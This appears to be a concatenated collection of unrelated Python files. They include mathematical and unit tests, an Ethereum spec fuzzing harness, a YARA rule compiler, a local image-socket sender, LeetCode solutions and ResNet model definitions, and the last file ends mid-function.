        Matrix([[1, -1, 1, -1, 1, 0]]),
        Matrix([[-1, 0, 1, -1, 1, 0]]),
        Matrix([[1, -1, 1, 0, -1, 0]]),
        Matrix([[1, 0, -1, 0, 1, 1]]),
        Matrix([[-1, 0, 1, 0, -1, 0]]),
        Matrix([[-1, 1, -1, 0, 1, 1]]),
        Matrix([[1, 0, -1, 1, -1, 1]]),
        Matrix([[1, 0, 0, 0, 1, -1]]),
        Matrix([[-1, 1, -1, 1, -1, 1]]),
        Matrix([[-1, 1, 0, 0, 1, -1]]),
        Matrix([[0, -1, 0, 0, 1, 1]]),
        Matrix([[1, 0, 0, -1, 0, 1]]),
        Matrix([[1, 0, 0, 1, -1, -1]]),
        Matrix([[-1, 1, 0, -1, 0, 1]]),
        Matrix([[-1, 1, 0, 1, -1, -1]]),
        Matrix([[0, -1, 0, 1, -1, 1]]),
        Matrix([[0, -1, 1, 0, 1, -1]]),
        Matrix([[1, 0, 1, -1, 0, -1]]),
        Matrix([[-1, 1, 1, -1, 0, -1]]),
        Matrix([[0, -1, 1, -1, 0, 1]]),
        Matrix([[0, -1, 1, 1, -1, -1]]),
        Matrix([[0, 0, -1, 1, 1, 0]]),
        Matrix([[1, 1, -1, 0, 0, 0]]),
        Matrix([[-1, 2, -1, 0, 0, 0]]),
        Matrix([[0, -1, 2, -1, 0, -1]]),
        Matrix([[0, 0, -1, 0, 0, 2]]),
        Matrix([[0, 0, -1, 2, -1, 0]]),
        Matrix([[0, 0, 0, -1, 2, 0]]),
        Matrix([[2, -1, 0, 0, 0, 0]]),
        Matrix([[0, 0, 0, 0, 0, 0]]),
        Matrix([[0, 0, 0, 0, 0, 0]]),
        Matrix([[0, 0, 0, 0, 0, 0]]),
        Matrix([[0, 0, 0, 0, 0, 0]]),
        Matrix([[0, 0, 0, 0, 0, 0]]),
        Matrix([[0, 0, 0, 0, 0, 0]]),
        Matrix([[-2, 1, 0, 0, 0, 0]]),
        Matrix([[0, 0, 0, 1, -2, 0]]),
        Matrix([[0, 0, 1, -2, 1, 0]]),
        Matrix([[0, 0, 1, 0, 0, -2]]),
        Matrix([[0, 1, -2, 1, 0, 1]]),
        Matrix([[1, -2, 1, 0, 0, 0]]),
        Matrix([[-1, -1, 1, 0, 0, 0]]),
        Matrix([[0, 0, 1, -1, -1, 0]]),
        Matrix([[0, 1, -1, -1, 1, 1]]),
        Matrix([[0, 1, -1, 1, 0, -1]]),
        Matrix([[1, -1, -1, 1, 0, 1]]),
        Matrix([[-1, 0, -1, 1, 0, 1]]),
        Matrix([[0, 1, -1, 0, -1, 1]]),
        Matrix([[0, 1, 0, -1, 1, -1]]),
        Matrix([[1, -1, 0, -1, 1, 1]]),
        Matrix([[1, -1, 0, 1, 0, -1]]),
        Matrix([[-1, 0, 0, -1, 1, 1]]),
        Matrix([[-1, 0, 0, 1, 0, -1]]),
        Matrix([[0, 1, 0, 0, -1, -1]]),
        Matrix([[1, -1, 0, 0, -1, 1]]),
        Matrix([[1, -1, 1, -1, 1, -1]]),
        Matrix([[-1, 0, 0, 0, -1, 1]]),
        Matrix([[-1, 0, 1, -1, 1, -1]]),
        Matrix([[1, -1, 1, 0, -1, -1]]),
        Matrix([[1, 0, -1, 0, 1, 0]]),
        Matrix([[-1, 0, 1, 0, -1, -1]]),
        Matrix([[-1, 1, -1, 0, 1, 0]]),
        Matrix([[1, 0, -1, 1, -1, 0]]),
        Matrix([[-1, 1, -1, 1, -1, 0]]),
        Matrix([[0, -1, 0, 0, 1, 0]]),
        Matrix([[1, 0, 0, -1, 0, 0]]),
        Matrix([[-1, 1, 0, -1, 0, 0]]),
        Matrix([[0, -1, 0, 1, -1, 0]]),
        Matrix([[0, -1, 1, -1, 0, 0]]),
        Matrix([[0, 0, -1, 0, 0, 1]]),
        Matrix([[0, 0, 0, 0, 0, -1]]),
    ]
    # positive roots: the first 36 entries of the root system
    assert [E6.to_omega(x) for x in E6.positive_roots] == [
        Matrix([[0, 0, 0, 0, 0, 1]]),
        Matrix([[0, 0, 1, 0, 0, -1]]),
        Matrix([[0, 1, -1, 1, 0, 0]]),
        Matrix([[0, 1, 0, -1, 1, 0]]),
        Matrix([[1, -1, 0, 1, 0, 0]]),
        Matrix([[-1, 0, 0, 1, 0, 0]]),
        Matrix([[0, 1, 0, 0, -1, 0]]),
        Matrix([[1, -1, 1, -1, 1, 0]]),
        Matrix([[-1, 0, 1, -1, 1, 0]]),
        Matrix([[1, -1, 1, 0, -1, 0]]),
        Matrix([[1, 0, -1, 0, 1, 1]]),
        Matrix([[-1, 0, 1, 0, -1, 0]]),
        Matrix([[-1, 1, -1, 0, 1, 1]]),
        Matrix([[1, 0, -1, 1, -1, 1]]),
        Matrix([[1, 0, 0, 0, 1, -1]]),
        Matrix([[-1, 1, -1, 1, -1, 1]]),
        Matrix([[-1, 1, 0, 0, 1, -1]]),
        Matrix([[0, -1, 0, 0, 1, 1]]),
        Matrix([[1, 0, 0, -1, 0, 1]]),
        Matrix([[1, 0, 0, 1, -1, -1]]),
        Matrix([[-1, 1, 0, -1, 0, 1]]),
        Matrix([[-1, 1, 0, 1, -1, -1]]),
        Matrix([[0, -1, 0, 1, -1, 1]]),
        Matrix([[0, -1, 1, 0, 1, -1]]),
        Matrix([[1, 0, 1, -1, 0, -1]]),
        Matrix([[-1, 1, 1, -1, 0, -1]]),
        Matrix([[0, -1, 1, -1, 0, 1]]),
        Matrix([[0, -1, 1, 1, -1, -1]]),
        Matrix([[0, 0, -1, 1, 1, 0]]),
        Matrix([[1, 1, -1, 0, 0, 0]]),
        Matrix([[-1, 2, -1, 0, 0, 0]]),
        Matrix([[0, -1, 2, -1, 0, -1]]),
        Matrix([[0, 0, -1, 0, 0, 2]]),
        Matrix([[0, 0, -1, 2, -1, 0]]),
        Matrix([[0, 0, 0, -1, 2, 0]]),
        Matrix([[2, -1, 0, 0, 0, 0]]),
    ]
|
import typing
from eth2spec.fuzzing.decoder import translate_typ, translate_value
from eth2spec.phase0 import spec
from eth2spec.utils import bls
from eth2spec.utils.ssz.ssz_impl import serialize
from preset_loader import loader
# TODO(gnattishness) fix config path difficult to do unless we assume the eth2spec
# module is at a fixed position relative to the configs
# (i.e. it is inside a cloned eth2.0-specs repo)
configs_path = "/eth2/eth2.0-specs/configs"
# TODO allow this to be adjusted?
# Apply the mainnet constants to the spec module before defining SSZ types,
# since type sizes depend on the loaded preset.
presets = loader.load_presets(configs_path, "mainnet")
spec.apply_constants_preset(presets)
class BlockHeaderTestCase(spec.Container):
    """SSZ container pairing a pre-state with the block to process."""
    pre: spec.BeaconState
    block: spec.BeaconBlock
# Sedes used to deserialize fuzzer-provided bytes into a test case.
block_header_sedes = translate_typ(BlockHeaderTestCase)
def FuzzerInit(bls_disabled: bool) -> None:
    """Fuzzer entry hook: optionally disable BLS signature verification."""
    if bls_disabled:
        # Skip expensive BLS checks while fuzzing.
        bls.bls_active = False
def FuzzerRunOne(input_data: bytes) -> typing.Optional[bytes]:
    """Run one fuzz iteration: deserialize a test case, apply the block
    header transition, and return the serialized post-state.

    Returns ``None`` when the transition is (expectedly) rejected.
    """
    test_case = translate_value(
        block_header_sedes.deserialize(input_data), BlockHeaderTestCase
    )
    try:
        # modifies state in place
        spec.process_block_header(state=test_case.pre, block=test_case.block)
        # NOTE - signature verification should do nothing with bls disabled
        return serialize(test_case.pre)
    except (AssertionError, IndexError):
        # Invalid blocks are an expected, non-crashing outcome for the fuzzer.
        return None
|
import re
from wedc.domain.core.data import cleaner
from wedc.domain.vendor.crf.crf_tokenizer import CrfTokenizer
def parse(text):
    """Clean, tokenize and de-duplicate ``text`` into a space-joined string.

    The input is cleaned, tokenized with the CRF tokenizer (HTML entities
    and tags recognized, tags skipped), each token cleaned, empty tokens
    dropped, and duplicates removed.
    """
    text = text_preprocessing(text)
    t = CrfTokenizer()
    t.setRecognizeHtmlEntities(True)
    t.setRecognizeHtmlTags(True)
    t.setSkipHtmlTags(True)
    tokens = t.tokenize(text)
    tokens = [token_preprocessing(token) for token in tokens]
    tokens = [_ for _ in tokens if _]
    # De-duplicate while preserving first-seen order: joining a `set`
    # produced a non-deterministic token order across runs.
    return str(' '.join(dict.fromkeys(tokens)))
def text_preprocessing(text):
    """Clean the raw document text before tokenization."""
    return cleaner.clean_text(text)
def token_preprocessing(token):
    """Clean a single token after tokenization."""
    return cleaner.clean_token(token)
|
# Demonstrate shallow copying: mutating the copy leaves the original intact.
a = [1, 9, 8, 7]
b = list(a)
b[2] = 7
print(f'Lista A: {a}')
print(f'Lista B: {b}')
class Solution:
    def wordPattern(self, pattern, str):
        """
        :type pattern: str
        :type str: str
        :rtype: bool

        A word sequence follows a pattern iff both induce the same ordered
        partition of positions. Each sequence is reduced to its canonical
        form (index of first occurrence of each element); the sequences
        match exactly when the canonical forms are equal.

        Note: the parameter is named `str` (shadowing the builtin) to keep
        the original call signature intact.
        """
        words = str.split(" ")

        def canonical(seq):
            # Map each distinct element to the order in which it first appeared.
            first_seen = {}
            return [first_seen.setdefault(item, len(first_seen)) for item in seq]

        return canonical(words) == canonical(pattern)
|
import unittest
from katas.kyu_7.tube_strike_options_calculator import calculator
class TubeStrikeTestCase(unittest.TestCase):
    """Unit tests for the tube-strike options calculator kata:
    calculator(distance, bus_drive, bus_walk) -> 'Bus' or 'Walk'."""

    def test_equals(self):
        self.assertEqual(calculator(5, 6, 1), 'Bus')

    def test_equals_2(self):
        self.assertEqual(calculator(4, 5, 1), 'Walk')

    def test_equals_3(self):
        self.assertEqual(calculator(5, 8, 0), 'Walk')

    def test_equals_4(self):
        self.assertEqual(calculator(5, 4, 3), 'Walk')

    def test_equals_5(self):
        self.assertEqual(calculator(11, 15, 2), 'Bus')

    def test_equals_6(self):
        # fractional distances should work as well
        self.assertEqual(calculator(0.6, 0.4, 0), 'Walk')
|
"""
Copyright (c) 2013, SMART Technologies ULC
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Copyright holder (SMART Technologies ULC) nor
the names of its contributors (Joshua Henn) may be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER (SMART Technologies
ULC) "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import string
from level import *
class EntityLoggerProxy(object):
    """Proxy around a shared class-level logger that prefixes each log
    message with the entity the statement belongs to.

    Originally there was a singleton logger, but to support a prefix for
    which entity the log statement belonged to, this proxy class was created.
    """

    entity = None      # per-instance entity used to build the message prefix
    logger = None      # shared underlying logger (class-level)
    formatter = None   # callable: formatter(entity).setLogLevel(level) -> prefix object

    @classmethod
    def setLogger(cls, logger):
        cls.logger = logger

    @classmethod
    def getLogger(cls):
        return cls.logger

    @classmethod
    def setFormatter(cls, formatter):
        cls.formatter = formatter

    @classmethod
    def getLevel(cls):
        return cls.logger.getEffectiveLevel()

    @classmethod
    def setLevel(cls, level):
        # Fixed: this @classmethod previously named its first argument `self`,
        # and logged via logger.log(level, None, "...") which made the stdlib
        # logger try to %-format None with a spare argument (TypeError).
        cls.logger.setLevel(level)
        cls.logger.log(level, "Changing logging level")

    def __init__(self, entity=None, level=None):
        self.entity = entity  # associate an entity with this logger
        if level:
            self.setLevel(level)

    def setEntity(self, entity):
        self.entity = entity

    def log(self, level, msg, *args, **kwargs):
        # Tell each (formatter-aware) argument the level of this statement.
        for arg in args:
            arg.setLogLevel(level)
        # Interpolate the args into the message ourselves.
        if len(args) > 0:  # if there are no args supplied for str replacement, don't even try
            # Fixed: string.replace(msg, ...) is Python-2-only; use str.replace.
            msg = msg.replace(r'%%s', r'%s')
            msg = msg % args
        # Formulate the prefix for this log statement
        prefix = "%s " % str(self.formatter(self.entity).setLogLevel(level)) if self.entity else ''
        # Fixed: do NOT forward *args again -- msg has already been %-formatted
        # above, so re-passing args made logging raise
        # "not all arguments converted during string formatting".
        self.logger.log(level, prefix + msg, **kwargs)

    def info(self, msg, *args, **kwargs):
        """ Override to support keywords """
        self.log(INFO, msg, *args, **kwargs)

    def warn(self, msg, *args, **kwargs):
        """ Override to support keywords """
        self.log(WARN, msg, *args, **kwargs)

    def debug(self, msg, *args, **kwargs):
        """ Override to support keywords """
        self.log(DEBUG, msg, *args, **kwargs)

    def trace(self, msg, *args, **kwargs):
        self.log(TRACE, msg, *args, **kwargs)

    def error(self, msg, *args, **kwargs):
        """ Override to support keywords """
        self.log(ERROR, msg, *args, **kwargs)

    def getFormatter(self):
        return self.formatter
|
# Copyright 2018 Ildar Nasyrov <https://it-projects.info/team/iledarn>
# License MIT (https://opensource.org/licenses/MIT).
from odoo.tests.common import TransactionCase
class TestDeliveryCarrierSecurity(TransactionCase):
    """Checks that website-bound delivery carriers are only visible from their
    own website context (multi-website record rules)."""

    # Run both at and after module installation.
    at_install = True
    post_install = True

    def setUp(self):
        super(TestDeliveryCarrierSecurity, self).setUp()
        # A second website owned by a freshly created company.
        self.website = self.env.ref("website.website2")
        self.company = self.env["res.company"].create({"name": "New Test Website"})
        self.website.company_id = self.company
        # Demo user with only read access on delivery carriers.
        self.user = self.env.ref(
            "website_multi_company_sale_delivery.delivery_carrier_read_user"
        )
        # self.user.write({'company_ids': [(4, self.company.id)], 'company_id': self.env.ref("base.main_company").id})
        self.user.write(
            {"company_ids": [(4, self.company.id)], "company_id": self.company.id}
        )
        self.country = self.env.ref("base.us")
        self.state = self.env.ref("base.state_us_2")
        # The carrier under test is restricted to our website/country/state.
        self.delivery_carrier = self.env.ref("delivery.delivery_carrier")
        self.delivery_carrier.write(
            {
                "website_ids": [(4, self.website.id)],
                "country_ids": [(6, 0, [self.country.id])],
                "state_ids": [(6, 0, [self.state.id])],
            }
        )
        # The remaining carriers belong to the default website only.
        other_carriers = self.env.ref(
            "delivery.normal_delivery_carrier"
        ) + self.env.ref("delivery.free_delivery_carrier")
        other_carriers.write(
            {"website_ids": [(4, self.env.ref("website.default_website").id)]}
        )
        self.all_carriers = other_carriers + self.delivery_carrier
        self.all_carriers.write({"website_published": True})

    def test_get_website_sale_countries_and_states(self):
        # Shipping destinations visible from our website must match exactly
        # the country/state configured on our carrier.
        countries = self.country.with_context(
            website_id=self.website.id
        ).get_website_sale_countries(mode="shipping")
        states = self.country.with_context(
            website_id=self.website.id
        ).get_website_sale_states(mode="shipping")
        self.assertEqual(countries, self.country)
        self.assertEqual(states, self.state)

    def test_get_delivery_carriers(self):
        # for frontend (there is website_id in context)
        delivery_carriers = (
            self.env["delivery.carrier"]
            .sudo(self.user)
            .with_context(website_id=self.website.id)
            .search([("website_published", "=", True)])
        )
        self.assertNotEqual(self.all_carriers, delivery_carriers)
        self.assertEqual(self.delivery_carrier, delivery_carriers)
        # for backend (no website_id in context and no backend_website_id in the user's settings either - all published carriers should get found
        self.user.backend_website_id = None
        delivery_carriers = (
            self.env["delivery.carrier"]
            .sudo(self.user)
            .search([("website_published", "=", True)])
        )
        self.assertEqual(self.all_carriers, delivery_carriers)
|
#!/usr/bin/env python
import json
from os import path
import sys
from time import time_ns
from gpiozero import DigitalOutputDevice
def load_data(command):
    """Load the timed signal sequence for *command* from commands/<command>.json."""
    commands_dir = path.join(path.dirname(path.realpath(__file__)), 'commands')
    with open(path.join(commands_dir, command + '.json')) as handle:
        return json.load(handle)
def transmit_data(data):
    """Replay a timed on/off sequence on GPIO pin 17.

    Each entry is {'time': seconds-from-start, 'signal': 0/1}; the function
    busy-waits until each entry's timestamp has elapsed, then applies it.
    Entries are assumed to be sorted by 'time' -- TODO confirm with the
    command JSON files.
    """
    line = DigitalOutputDevice(17)
    start_ns = time_ns()
    for entry in data:
        # Compare in integer nanoseconds; the original divided by 1e9 on
        # every poll iteration, costing precision and time in the hot loop.
        target_ns = int(entry['time'] * 1e9)
        while time_ns() - start_ns <= target_ns:
            pass  # busy-wait: sleep() granularity is too coarse for RF timing
        line.value = entry['signal']
    line.value = 0  # always leave the line low when done
# Script entry point: the command name is taken from the first CLI argument.
data = load_data(sys.argv[1])
transmit_data(data)
import configparser
import sys
import requests
import yara
ERROR_CODE = 1
def DownloadFile(url, rulefile):
    """Stream *url* into *rulefile* on disk.

    Raises requests.HTTPError on a non-2xx response; previously a 404/500
    error page would silently be saved as the rules file.
    """
    r = requests.get(url, stream=True, timeout=30)  # timeout: never hang forever
    r.raise_for_status()
    with open(rulefile, 'wb') as f:
        for chunk in r.iter_content(chunk_size=(100 * 1024)):
            if chunk:  # skip keep-alive chunks
                f.write(chunk)
def main():
    """ Main logic for program: read service.conf, optionally fetch remote
    rules, then compile (and re-save) the YARA ruleset.

    Returns 0 on success; exits with ERROR_CODE on compilation failure.
    """
    cfg = configparser.ConfigParser()
    cfg.read('service.conf')
    rule_location = 'rules.yar'
    get_remote = False
    # Parse configuration options
    if cfg.has_section('yara_rules'):
        rule_location = cfg['yara_rules'].get('local_path', fallback='rules.yar')
        get_remote = cfg['yara_rules'].getboolean('get_remote', fallback=False)
        if get_remote:
            DownloadFile(cfg['yara_rules'].get('download_url'), rule_location)
    else:
        print("Configuration Error: Cannot find Rules section. Using default values.")
    # attempt to compile rules
    try:
        rules = yara.compile(rule_location)
        # NOTE(review): this overwrites the rule *source* file with the
        # compiled form -- confirm that is intended.
        rules.save(rule_location)
    # Fixed: the original caught the undefined names `YaraSyntaxError` /
    # `YaraError`, which would raise NameError instead of handling the error.
    except yara.SyntaxError:
        print("Syntax error in the YARA rules.")
        sys.exit(ERROR_CODE)
    except yara.Error:
        print("Unknown YARA error.")
        sys.exit(ERROR_CODE)
    except Exception as e:
        print(e)
        sys.exit(ERROR_CODE)
    return 0
if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C exits with the generic error code rather than a traceback.
        sys.exit(ERROR_CODE)
import os
# Directory one level above this script; each run/<folder> holds one measurement.
genDir = os.path.join(os.path.dirname(os.path.relpath(__file__)), "../")
dir_name = 'run'
folders = os.listdir(genDir + "./%s" % (dir_name))
current = os.getcwd()
# CSV header for the aggregated output printed below.
print("Temp,Frequency,Power,Error")
for folder in folders:
    os.chdir("%s/%s/%s" % (current, dir_name, folder))
    # NOTE(review): `source` is a bash builtin; os.system uses /bin/sh, which
    # may not support it -- confirm the target shell, or use ". cal_result".
    os.system("source cal_result")
for folder in folders:
    result_path = "%s/%s/%s/code_result_with_error" % (current, dir_name, folder)
    # Fixed: the file handle was opened per folder and never closed.
    with open(result_path, 'r') as f:
        print(f.read())
|
from . import core
from . import random
from .core import *
from .random import *
|
'''
Created on Dec 12, 2020
@author: liu.zhengr
'''
import socket
import os
import sys
import struct
class ImageSocketConnector():
    """Sends an image file to a local server over a plain TCP socket."""

    def __init__(self):
        # Hard-coded loopback endpoint of the receiving server.
        self.address = ('127.0.0.1', 5612)

    def send(self, filePath: str):
        """Send picture to server
        param: filePath File path
        """
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(self.address)
        except socket.error as msg:
            print(msg)
            sys.exit(1)
        try:
            if os.path.isfile(filePath):
                # File-header layout: '128s' = 128-byte file name, 'l' = one
                # int/long carrying the file size.
                fileinfo_size = struct.calcsize('128sl')
                # Header sending is currently disabled; kept for reference.
                #fhead = struct.pack('128sl', bytes(os.path.basename(filepath).encode('utf-8')),os.stat(filepath).st_size)
                #print("1")
                #s.send(fhead)
                print('client filepath: {0}'.format(filePath))
                # Fixed: the file handle was never closed.
                with open(filePath, 'rb') as fp:
                    while 1:
                        data = fp.read(1024)
                        if not data:
                            print('{0} file send over...'.format(filePath))
                            break
                        s.send(data)
        finally:
            # Fixed: the socket leaked whenever filePath was not a file.
            s.close()
class Solution:
    # Annotations are string literals so the module imports without
    # `from typing import List` (the bare name `List` raised NameError).
    def threeSum(self, nums: "List[int]") -> "List[List[int]]":
        """
        Given an array nums of n integers, are there elements
        a, b, c in nums such that a + b + c = 0? Find all unique
        triplets in the array which gives the sum of zero.
        Notice that the solution set must not contain duplicate triplets.

        Sorts `nums` in place; O(n^2) two-pointer scan per anchor element.
        """
        nums.sort()
        numlen = len(nums)
        ans = []
        for i in range(numlen - 2):
            # Skip duplicate anchors to avoid duplicate triplets.
            if i > 0 and nums[i] == nums[i - 1]:
                continue
            j = i + 1
            k = numlen - 1
            while j < k:
                sum3 = nums[i] + nums[j] + nums[k]
                if sum3 == 0:
                    ans.append([nums[i], nums[j], nums[k]])
                    # Advance past duplicates on both sides of the match.
                    while j < k and nums[j] == nums[j + 1]:
                        j += 1
                    j += 1
                    while j < k and nums[k] == nums[k - 1]:
                        k -= 1
                    k -= 1
                elif sum3 < 0:
                    j += 1  # sum too small: move the left pointer right
                else:
                    k -= 1  # sum too large: move the right pointer left
        return ans
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------------------------------------------------
# arclytics_sim
# utilities.py
#
# Attributions:
# [1]
# ----------------------------------------------------------------------------------------------------------------------
__author__ = ['Andrew Che <@codeninja55>']
__license__ = 'MIT'
__version__ = '2.0.0'
__status__ = 'production'
__date__ = '2019.10.02'
"""utilities.py:
Utilities for extensions that are not clearly defined.
"""
import decimal
import json
from datetime import datetime
import numpy as np
from bson import ObjectId
# Key name under which the API's JWT token travels -- presumably a cookie or
# header name; confirm against the middleware that reads it.
API_TOKEN_NAME = 'JWT_TOKEN'
class JSONEncoder(json.JSONEncoder):
    """Extends the json-encoder to properly convert dates and bson.ObjectId"""

    def default(self, o):
        """Serialize values the stock encoder rejects.

        Sets/ndarrays become lists, datetimes become ISO strings, NumPy
        integers become ints, and NumPy floats / Decimals become strings
        (string form preserves their exact textual representation).
        """
        if isinstance(o, set):
            return list(o)
        if isinstance(o, np.ndarray):
            return o.tolist()
        if isinstance(o, datetime):
            return str(o.isoformat())
        # np.integer covers int16/int32/int64 in one check; the old code
        # tested each and also used np.int, an alias removed in NumPy >= 1.24
        # (AttributeError at runtime).
        if isinstance(o, np.integer):
            return int(o)
        # np.floating covers float32 too; previously np.float64 was tested
        # twice, the removed np.float alias was used, and float32 fell through.
        if isinstance(o, np.floating):
            return str(o)
        if isinstance(o, decimal.Decimal):
            return str(o)
        # Checked last (no overlap with the branches above) so the common
        # numeric/date paths never touch the bson import.
        if isinstance(o, ObjectId):
            return str(o)
        return json.JSONEncoder.default(self, o)
|
import tensorflow as tf
from tensorflow.keras import layers, Sequential, Model
class BasicBlock(layers.Layer):
    """Two-conv residual block (ResNet-18/34 style).

    When stride != 1 the shortcut is a 1x1 conv + BN projection; otherwise it
    is the identity (an empty Sequential).
    """

    def __init__(self, kernels, stride=1):
        super(BasicBlock, self).__init__()
        self.features = Sequential([
            layers.Conv2D(kernels, (3, 3), strides=stride, padding='same'),
            layers.BatchNormalization(),
            layers.ReLU(),
            layers.Conv2D(kernels, (3, 3), strides=1, padding='same'),
            layers.BatchNormalization()
        ])
        if stride != 1:
            shortcut = [
                layers.Conv2D(kernels, (1, 1), strides=stride),
                layers.BatchNormalization()
            ]
        else:
            shortcut = []
        # Fixed typo: attribute was misspelled `shorcut`.
        self.shortcut = Sequential(shortcut)

    def call(self, inputs, training=False):
        residual = self.shortcut(inputs, training=training)
        x = self.features(inputs, training=training)
        # Final ReLU is applied after the residual addition, per the paper.
        x = tf.nn.relu(layers.add([residual, x]))
        return x
class BottleNeckBlock(layers.Layer):
    """1x1 -> 3x3 -> 1x1 bottleneck residual block (ResNet-50+ style).

    Output channels are kernels * 4; the shortcut always projects with a
    1x1 conv so the channel counts match for the addition.
    """

    def __init__(self, kernels, stride=1):
        super(BottleNeckBlock, self).__init__()
        self.features = Sequential([
            layers.Conv2D(kernels, (1, 1), strides=1, padding='same'),
            layers.BatchNormalization(),
            # Fixed: ReLU activations between the conv stages were missing,
            # which made the whole block a purely linear stack of convs.
            layers.ReLU(),
            layers.Conv2D(kernels, (3, 3), strides=stride, padding='same'),
            layers.BatchNormalization(),
            layers.ReLU(),
            layers.Conv2D(kernels * 4, (1, 1), strides=1, padding='same'),
            layers.BatchNormalization(),
        ])
        # Fixed typo: attribute was misspelled `shorcut`.
        self.shortcut = Sequential([
            layers.Conv2D(kernels * 4, (1, 1), strides=stride),
            layers.BatchNormalization()
        ])

    def call(self, inputs, training=False):
        residual = self.shortcut(inputs, training=training)
        x = self.features(inputs, training=training)
        x = tf.nn.relu(x + residual)
        return x
class ResNet(Model):
    """Generic ResNet: a stem conv followed by four stages of residual
    blocks, global average pooling, and a softmax classifier head."""

    def __init__(self, block, num_blocks, num_classes, input_shape=(32, 32, 3)):
        super(ResNet, self).__init__()
        # Stem: single 3x3 conv + BN + ReLU (CIFAR-style, no max-pool).
        self.conv1 = Sequential([
            layers.Input(input_shape),
            layers.Conv2D(64, (3, 3), padding='same', use_bias=False),
            layers.BatchNormalization(),
            layers.ReLU()
        ])
        # Four stages; the first keeps resolution, the rest downsample by 2.
        self.conv2_x = self._make_layer(block, 64, num_blocks[0], 1)
        self.conv3_x = self._make_layer(block, 128, num_blocks[1], 2)
        self.conv4_x = self._make_layer(block, 256, num_blocks[2], 2)
        self.conv5_x = self._make_layer(block, 512, num_blocks[3], 2)
        self.gap = layers.GlobalAveragePooling2D()
        self.fc = layers.Dense(num_classes, activation='softmax')

    def _make_layer(self, block, kernels, num_blocks, stride):
        # Only the first block of a stage may downsample; the rest use stride 1.
        stage_strides = [stride] + [1] * (num_blocks - 1)
        return Sequential([block(kernels, s) for s in stage_strides])

    def call(self, inputs):
        features = self.conv1(inputs)
        for stage in (self.conv2_x, self.conv3_x, self.conv4_x, self.conv5_x):
            features = stage(features)
        pooled = self.gap(features)
        return self.fc(pooled)
def ResNet18(num_classes):
    # 18 layers: BasicBlock x [2, 2, 2, 2]
    return ResNet(BasicBlock, [2, 2, 2, 2], num_classes)
def ResNet34(num_classes):
    # 34 layers: BasicBlock x [3, 4, 6, 3]
    return ResNet(BasicBlock, [3, 4, 6, 3], num_classes)
def ResNet50(num_classes):
    # 50 layers: BottleNeckBlock x [3, 4, 6, 3]
    return ResNet(BottleNeckBlock, [3, 4, 6, 3], num_classes)
def ResNet101(num_classes):
    # 101 layers: BottleNeckBlock x [3, 4, 23, 3]
    return ResNet(BottleNeckBlock, [3, 4, 23, 3], num_classes)
def ResNet152(num_classes):
    # 152 layers: BottleNeckBlock x [3, 8, 36, 3]
    return ResNet(BottleNeckBlock, [3, 8, 36, 3], num_classes)
|
from six.moves import cStringIO
from pysmt.smtlib.parser import SmtLibParser
from pysmt.shortcuts import get_model, Solver
import types
# Tiny QF_AUFBV problem: two byte-array cells constrained to fixed values.
DEMO_SMTLIB= \
"""
(set-logic QF_AUFBV )
(declare-fun A-data () (Array (_ BitVec 32) (_ BitVec 8) ) )
(assert (and (= (_ bv108 8) (select A-data (_ bv2 32) ) ) (= (_ bv101 8) (select A-data (_ bv1 32) ) ) ) )
(check-sat)
"""
parser = SmtLibParser()
script = parser.get_script(cStringIO(DEMO_SMTLIB))
f = script.get_last_formula()
# Solve with z3 specifically, because below we reach into the raw z3 model.
model = get_model(f, solver_name="z3")
print(model)
print(str(model.__dict__))
# NOTE(review): `z3_model` is a private attribute of pysmt's z3 wrapper --
# this bypasses the public API and may break across pysmt versions.
py_model = model.__dict__['z3_model']
for decl in py_model.decls():
    print(decl.kind())
    print(decl.name())
    print(decl.params())
    print(decl.range())
    print(py_model[decl])
    # Array interpretations come back as a list of (index, value) pairs
    # plus a default -- inspect each entry.
    a = py_model[decl].as_list()
    for x in a:
        print(str(type(x) == list))
        print("x=" + str(x))
# help(a)
# help(py_model)
# print(py_model)
# help(model.converter)
"""
Module dependencies:
all - {core, files_management, utils} -> prepostprocessing
"""
import datetime
import logging
import urllib
import urllib.request
import urllib.response
from typing import Tuple
import lxml
import lxml.etree
import lxml.html
import retrying
import core
import files_management as fm
logging.basicConfig(
    level=logging.INFO,
    format="%(levelname)s [%(filename)s:%(lineno)s - %(funcName)20s()] %(message)s",
)
SEC = 1000  # in ms
# NOTE(review): loaded at import time -- every import of this module hits
# the metadata store.
all_metas = fm.PageMeta.get_all()
def download_raw(page_meta: fm.PageMeta, force_override: bool = False) -> None:
    """Download the page's raw HTML and persist it plus the download time.

    Skips the download when the raw HTML already exists, unless
    `force_override` is set. Retries the request with exponential backoff
    (up to 10 attempts) and gives up with a warning on repeated failure.
    """
    logging.info("page_id=%s", page_meta.page_id)
    exists = page_meta.raw_html.exists()
    if exists:
        logging.info(
            "Raw page has already been downloaded. page_id=%s", page_meta.page_id,
        )
        if force_override:
            logging.info("It will be overwritten. page_id=%s", page_meta.page_id)
        else:
            logging.info("Operation skipped. page_id=%s", page_meta.page_id)
            return
    else:
        logging.info("Raw page will be downloaded. page_id=%s", page_meta.page_id)

    @retrying.retry(
